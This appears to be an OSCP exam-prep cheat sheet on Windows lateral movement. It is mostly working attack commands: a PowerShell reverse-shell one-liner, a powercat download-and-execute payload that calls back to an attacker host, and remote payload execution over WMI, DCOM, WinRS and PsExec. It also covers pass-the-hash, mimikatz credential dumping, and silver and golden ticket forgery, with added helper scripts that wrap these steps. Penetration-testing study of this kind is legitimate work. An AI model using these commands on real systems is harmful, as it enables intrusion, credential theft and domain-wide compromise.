OSCP Exam Prep

Lateral Movement

Via Reverse Shells

One-liner reverse shell (plain TCP client, no download needed on the target). Note that powershell -e / -EncodedCommand expects Base64 of the UTF-16LE ("Unicode") bytes of the script, which is why the encoding step below uses [Text.Encoding]::Unicode and not UTF8:

    $payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP>",<Listening Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

Powercat reverse shell (the target fetches powercat.ps1 from a web server on Kali, so it needs outbound HTTP to you):

    $payload = "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1');powercat -c <Kali IP> -p <Listening Port> -e powershell"
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

WMI

From the compromised machine (the process is created on the target over RPC/DCOM, TCP 135 plus a dynamic high port; the account needs local admin rights on the target):
    wmic /node:<target IP> /user:<username> /password:<password> process call create "<payload>"

Execute payload
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "cmd"
    
    Example - $full_payload = "powershell -nop -w hidden -e $encodedPayload"
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "$full_payload"
        # Run these from a PowerShell prompt: cmd.exe does not expand $full_payload.
        # A ReturnValue = 0 in the output means the process was created; 2 is access denied.

Powershell

$username = "<username>";
$password = "<password>";
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$sessionOption = New-CimSessionOption -Protocol Dcom
    # Dcom = WMI over RPC (TCP 135 + dynamic port); the default protocol is WSMan, which needs WinRM (5985/5986) on the target
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $sessionOption

$full_payload = "powershell -nop -w hidden -e $encodedPayload"

Execute payload
    Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $full_payload}
        # Check ReturnValue in the output: 0 = process created, 2 = access denied
    
    OR (interactive session over WinRM instead of DCOM; TCP 5985/5986 must be reachable and the user must be a local admin or in Remote Management Users on the target)
    
    New-PSSession -ComputerName <IP> -Credential $credential
    Enter-PSSession <session Id>
    
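The WMI and PowerShell sections above both create a process on the target through Win32_Process.Create, but neither checks whether the call actually succeeded. As an added example (not code from the original page), the function below wraps the CIM-over-DCOM variant, maps the documented return codes of Win32_Process.Create to their meaning, and tears the session down afterwards. The target name files04, the account CORP\jen with its password, and the encoded payload string are all assumed placeholders.

```powershell
# Added example, not from the original page. Remote process creation over WMI
# (CIM session, DCOM transport) with the Create return code interpreted.
# Target, credential and payload values in the usage section are assumptions.

function Invoke-WmiProcess {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][string]$CommandLine
    )

    # Documented return values of Win32_Process.Create.
    $codes = @{
        0 = 'Success'; 2 = 'Access denied'; 3 = 'Insufficient privilege'
        8 = 'Unknown failure'; 9 = 'Path not found'; 21 = 'Invalid parameter'
    }

    # DCOM: RPC endpoint mapper on TCP 135 plus a dynamic high port to the target.
    $opt = New-CimSessionOption -Protocol Dcom
    $session = New-CimSession -ComputerName $ComputerName -Credential $Credential -SessionOption $opt -ErrorAction Stop
    try {
        $call = @{
            CimSession = $session
            ClassName  = 'Win32_Process'
            MethodName = 'Create'
            Arguments  = @{ CommandLine = $CommandLine }
        }
        $result = Invoke-CimMethod @call

        $code = [int]$result.ReturnValue
        $meaning = $codes[$code]
        if (-not $meaning) { $meaning = "Undocumented return code $code" }

        [pscustomobject]@{
            ComputerName = $ComputerName
            ReturnValue  = $code
            Meaning      = $meaning
            ProcessId    = $result.ProcessId   # only populated when ReturnValue is 0
        }
    }
    finally {
        # Do not leave an authenticated CIM session lying around on the foothold.
        Remove-CimSession -CimSession $session
    }
}

# Usage (all values assumed; run from the compromised host as a user who is
# local admin on the target):
$secure = ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList 'CORP\jen', $secure
$encodedPayload = '<Base64 UTF-16LE payload from the reverse-shell section>'

$r = Invoke-WmiProcess -ComputerName 'files04' -Credential $cred -CommandLine "powershell -nop -w hidden -e $encodedPayload"
$r
if ($r.ReturnValue -ne 0) { Write-Warning "Process creation failed on $($r.ComputerName): $($r.Meaning)" }
```

A ReturnValue of 0 only tells you that powershell.exe started on the target; if the listener still sees nothing, the usual causes are a wrongly encoded payload or egress filtering on the target, not the WMI call itself.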

WINRS

$full_payload = "powershell -nop -w hidden -e $encodedPayload"
winrs -r:<target IP/hostname> -u:<domain name>\<username> -p:<password> "$full_payload"
    # Runs over WinRM (5985/5986); the user must be a local admin or a member of Remote Management Users on the target.
    # Run from a PowerShell prompt so $full_payload expands.

PsExec

On Kali machine:
    git clone https://github.com/davehardy20/sysinternals.git
        > Located in sysinternals/psexec64.exe
        > Transfer the executable to the compromised machine

On the compromised machine (the account needs local admin on the target: PsExec copies a service binary to the ADMIN$ share over SMB/445 and starts it through the service control manager):
    psexec64.exe -i \\<target IP/hostname> -u <domain name>\<username> -p "<password>" "<payload>"
        # -i runs the process interactively on the target; add -accepteula on first use to skip the EULA prompt

Passing the Hash

On Kali machine:
	impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
	proxychains impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
		# -hashes takes LM:NT; the empty LM half before the colon is fine. Use <domain>/<username>@<target IP> for a domain account.
		# Needs local admin on the target; wmiexec runs the command over WMI (135) and reads the output back over SMB (445).
		# impacket-psexec and impacket-smbexec accept the same -hashes syntax if WMI is blocked.

DCOM

1. From a PowerShell prompt on the compromised machine, as a user with local admin rights on the target, instantiate a remote MMC 2.0 application (DCOM over TCP 135 plus a dynamic high port)
	$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

2. Start up a listener to catch the reverse shell on our Kali
	nc -nlvp 4444

3. Generate the payload and run it through the MMC view (ExecuteShellCommand arguments: command, working directory, parameters, window state; 7 runs it minimized)
	$full_payload = "powershell -nop -w hidden -e $encodedPayload"
	$dcom.Document.ActiveView.ExecuteShellCommand("<cmd | powershell>",$null,"$full_payload","7")
		# With powershell as the command the parameters are run as-is; with cmd, prefix the parameters with /c

4. Return to the listener on our Kali; we should receive a reverse shell from the target machine.

SSH private keys

ssh-keygen -t rsa
	# Generates an SSH keypair (append the .pub half to the target user's ~/.ssh/authorized_keys)

ssh -i <private key> <username>@<IP>
	# A private key found on a compromised host must be mode 600 (chmod 600 <private key>) or ssh refuses to use it
ssh -i <private key> <username>@<IP> -o IdentitiesOnly=yes
	# Use when there are multiple private keys in the .ssh directory, so only the named key is offered

Mimikatz

./mimikatz.exe
privilege::debug
	# Needs local admin (SeDebugPrivilege) on the host mimikatz runs on
	Identify target service user NTLM hash: sekurlsa::logonpasswords
		# Only returns credentials of accounts that have a logon session on this host
	Identify krbtgt NTLM hash: lsadump::lsa /patch
		# Run on a Domain Controller; dumps NTLM hashes of domain accounts, including krbtgt
	Get Domain SID: whoami /user
		# Prints the user SID; the domain SID is that value with the trailing RID removed (S-1-5-21-X-Y-Z-1105 -> S-1-5-21-X-Y-Z)

Overpass the Hash (turn an NTLM hash into a Kerberos TGT without the password)
	sekurlsa::pth /user:<username> /ntlm:<NTLM hash> /domain:<domain name> /run:<cmd | powershell>
	net use \\<target IP/hostname>
		# Run in the spawned window: the first Kerberos-authenticated access requests a TGT for the user
	./PsExec64.exe \\<target IP/hostname> <cmd | powershell>

Pass the Ticket
	sekurlsa::tickets /export
		# dir *.kirbi | findstr <username>
	kerberos::ptt <cifs.kirbi file name>
		# Access the resource as the current user; authentication now uses the injected ticket (a krbtgt/<domain> .kirbi is a TGT, a cifs/<host> .kirbi is a service ticket for that host only)
	Example: ls \\<target IP/hostname>\<share name>
		iwr -UseDefaultCredentials http://<target IP/hostname>

Silver Ticket for a specific service (forged service ticket; needs the NTLM hash of the account running the service and never contacts the DC):
	kerberos::golden /rc4:<service account NTLM hash>  /sid:<Domain SID>  /domain:<domain name> /ptt /target:<FQDN of the host running the service>  /service:<SPN service class, e.g. cifs, http> /user:<username to impersonate>


Golden Ticket for all services (forged TGT; needs the krbtgt NTLM hash dumped from a DC):
	kerberos::golden /user:<username> /domain:<domain name> /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt

	Verify tickets with: klist
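The ticket-forging commands above need the domain SID, and the page's hint ("whoami /user") actually prints the user SID, from which the domain SID must be derived. As an added example (not code from the original page, and not a PowerView or mimikatz function), ConvertTo-DomainSid below strips the RID using .NET's SecurityIdentifier.AccountDomainSid, rejecting SIDs that are not account SIDs (such as S-1-5-18), and two helpers assemble the silver and golden ticket commands with the parameters in the right places. The SID S-1-5-21-1234567890-234567890-345678901-1105, the domain example.local, the host web01.example.local and the user names are constructed placeholders.

```powershell
# Added example, not from the original page. Derives the domain SID that
# kerberos::golden needs and builds the silver/golden ticket commands.
# All SIDs, names and hashes in the usage section are constructed placeholders.

function ConvertTo-DomainSid {
    param([string]$AccountSid)

    # Default to the current logon's SID, which is what "whoami /user" shows.
    if (-not $AccountSid) {
        $AccountSid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    }

    $sid = New-Object System.Security.Principal.SecurityIdentifier($AccountSid)

    # AccountDomainSid drops the trailing RID (S-1-5-21-X-Y-Z-1105 -> S-1-5-21-X-Y-Z).
    # It is $null for well-known SIDs such as S-1-5-18 (SYSTEM), which have no domain part.
    if (-not $sid.AccountDomainSid) {
        throw "$AccountSid is not a domain or machine account SID"
    }
    return $sid.AccountDomainSid.Value
}

function New-SilverTicketCommand {
    param(
        [Parameter(Mandatory)][string]$DomainSid,
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][string]$TargetHost,   # FQDN of the host running the service
        [Parameter(Mandatory)][string]$Service,      # SPN service class: cifs, http, mssqlsvc, ...
        [Parameter(Mandatory)][string]$ServiceNtlm,  # NTLM hash of the account the service runs as
        [Parameter(Mandatory)][string]$User          # user to impersonate; the service does not verify it with the DC
    )
    "kerberos::golden /rc4:$ServiceNtlm /sid:$DomainSid /domain:$Domain /ptt /target:$TargetHost /service:$Service /user:$User"
}

function New-GoldenTicketCommand {
    param(
        [Parameter(Mandatory)][string]$DomainSid,
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][string]$KrbtgtNtlm,   # from lsadump::lsa /patch on a DC
        [Parameter(Mandatory)][string]$User
    )
    "kerberos::golden /user:$User /domain:$Domain /sid:$DomainSid /krbtgt:$KrbtgtNtlm /ptt"
}

# Usage with a constructed user SID (1105 is the RID; everything before it is the domain SID):
$domainSid = ConvertTo-DomainSid -AccountSid 'S-1-5-21-1234567890-234567890-345678901-1105'
$domainSid

New-SilverTicketCommand -DomainSid $domainSid -Domain 'example.local' -TargetHost 'web01.example.local' -Service 'http' -ServiceNtlm '<service account NTLM hash>' -User 'svcadmin'

New-GoldenTicketCommand -DomainSid $domainSid -Domain 'example.local' -KrbtgtNtlm '<krbtgt NTLM hash>' -User 'anyuser'

# Fails by design: SYSTEM's SID carries no domain part, so no ticket can be forged from it.
try { ConvertTo-DomainSid -AccountSid 'S-1-5-18' } catch { Write-Warning $_ }
```

Calling ConvertTo-DomainSid with no argument on a domain-joined session returns the domain SID of the logged-on user; on a non-joined host it returns the local machine SID, which is only useful for local accounts, not for Kerberos tickets.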

Creating Users
